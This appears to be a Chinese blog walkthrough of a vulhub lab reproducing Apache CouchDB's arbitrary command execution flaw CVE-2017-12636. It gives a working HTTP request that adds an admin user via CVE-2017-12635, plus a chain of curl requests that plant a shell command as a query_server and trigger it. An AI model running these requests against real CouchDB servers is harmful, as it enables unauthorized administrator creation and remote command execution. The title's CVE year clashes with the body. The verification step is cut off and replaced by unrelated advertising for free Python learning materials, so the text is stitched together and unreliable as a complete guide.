13 - vulhub - Couchdb 任意命令执行漏洞（CVE-2024-12636）

简介：

Apache CouchDB是一个开源数据库，专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。应用广泛，如BBC用在其动态内容展示平台，Credit Suisse用在其内部的商品部门的市场框架，Meebo，用在其社交平台（web和应用程序）。

在2017年11月15日，CVE-2017-12635和CVE-2017-12636披露，CVE-2017-12636是一个任意命令执行漏洞，我们可以通过config api修改couchdb的配置query_server，这个配置项在设计、执行view的时候将被运行。

影响版本

小于 1.7.0 以及小于 2.1.1

漏洞原理

可以通过config api修改couchdb的配置query_server，这个配置项在设计、执行view的时候将被运行。

CouchDB管理用户可以通过HTTP（S）配置数据库服务器，其中可以启用的配置选项包括操作系统级二进制文件的路径。这允许CouchDB管理员用户以CouchDB用户的身份执行任意shell命令，包括从公共互联网上下载和执行脚本。

漏洞复现

---

环境准备

Couchdb 2.x和1.x的API接口有一定的区别，所以这个漏洞的利用方式也不同。本环境启动是1.6.0版本，如果你想测试2.1.0版本，可以启动CVE-2017- 12635附带的环境。

靶机环境 139.196.87.102 (vulhub)

攻击机环境 192.168.8.137 （虚拟机 Ubuntu 20、Java1.8、Burp）

启动 Couchdb 垂直权限绕过漏洞 环境

1.进入 vulhub 的 Couchdb 任意命令执行漏洞 路径

cd /usr/local/tools/vulhub/couchdb/CVE-2017-12636

2.编译并启动环境

docker-compose up -d

3.查看环境运行状态

docker ps | grep vulhub

---

---

启动完成后，访问http://139.196.87.102:5984/浏览Couchdb的欢迎页面。

---

---

漏洞检测

漏洞检测

开发或运维人员检查是否使用了受影响版本范围内的Apache CouchDB，是否配置了强口令和网络访问控制策略。

漏洞利用

该漏洞是需要登录用户方可触发，如果不知道目标管理员密码，可以利用 CVE-2017-12635 先增加一个管理员用户。

增加管理用户的数据包如下

PUT /_users/org.couchdb.user:vulhub HTTP/1.1

Host: 139.196.87.102:5984

Accept: /

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json

Content-Length: 108

{

“type”: “user”,

“name”: “vulhub”,

“roles”: [“_admin”],

“roles”: [],

“password”: “vulhub”

}

---

---

1.7.0 以下的说明

依次执行如下请求即可触发任意命令执行：

curl -X PUT ‘http://vulhub:vulhub@139.196.87.102:5984/_config/query_servers/cmd’ -d ‘“id >/tmp/success”’

curl -X PUT ‘http://vulhub:vulhub@139.196.87.102:5984/vultest’

curl -X PUT ‘http://vulhub:vulhub@139.196.87.102:5984/vultest/vul’ -d ‘{“_id”:“770895a97726d5ca6d70a22173005c7b”}’

curl -X POST ‘http://vulhub:vulhub@139.196.87.102:5984/vultest/_temp_view?limit=10’ -d ‘{“language”:“cmd”,“map”:“”}’ -H ‘Content-Type:application/json’

其中，vulhub:vulhub为管理员账号密码。

第一个请求是添加一个名字为cmd的query_servers，其值为"id >/tmp/success"，这就是我们要执行的命令。

第二、三个请求是添加一个数据库和文档，这里添加了一个可以查询的。

第四个请求在这个数据库里进行，因为我将其设置为cmd，这里就是我最初cmd的开始添加的命名的query_servers最后触发命令执行。

---

---

验证漏洞利用是否成功

做了那么多年开发，自学了很多门编程语言，我很明白学习资源对于学一门新语言的重要性，这些年也收藏了不少的Python干货，对我来说这些东西确实已经用不到了，但对于准备自学Python的人来说，或许它就是一个宝藏，可以给你省去很多的时间和精力。

别在网上瞎学了，我最近也做了一些资源的更新，只要你是我的粉丝，这期福利你都可拿走。

我先来介绍一下这些东西怎么用，文末抱走。

---

（1）Python所有方向的学习路线（新版）

这是我花了几天的时间去把Python所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照上面的知识点去找对应的学习资源，保证自己学得较为全面。

最近我才对这些路线做了一下新的更新，知识体系更全面了。

（2）Python学习视频

包含了Python入门、爬虫、数据分析和web开发的学习视频，总共100多个，虽然没有那么全面，但是对于入门来说是没问题的，学完这些之后，你可以按照我上面的学习路线去网上找其他的知识资源进行进阶。

（3）100多个练手项目

我们在看视频学习的时候，不能光动眼动脑不动手，比较科学的学习方法是在理解之后运用它们，这时候练手项目就很适合了，只是里面的项目比较多，水平也是参差不齐，大家可以挑自己能做的项目去练练。

（4）200多本电子书

这些年我也收藏了很多电子书，大概200多本，有时候带实体书不方便的话，我就会去打开电子书看看，书籍可不一定比视频教程差，尤其是权威的技术书籍。

基本上主流的和经典的都有，这里我就不放图了，版权问题，个人看看是没有问题的。

（5）Python知识点汇总

知识点汇总有点像学习路线，但与学习路线不同的点就在于，知识点汇总更为细致，里面包含了对具体知识点的简单说明，而我们的学习路线则更为抽象和简单，只是为了方便大家只是某个领域你应该学习哪些技术栈。

（6）其他资料

还有其他的一些东西，比如说我自己出的Python入门图文类教程，没有电脑的时候用手机也可以学习知识，学会了理论之后再去敲代码实践验证，还有Python中文版的库资料、MySQL和HTML标签大全等等，这些都是可以送给粉丝们的东西。

这些都不是什么非常值钱的东西，但对于没有资源或者资源不是很好的学习者来说确实很不错，你要是用得到的话都可以直接抱走，关注过我的人都知道，这些都是可以拿到的。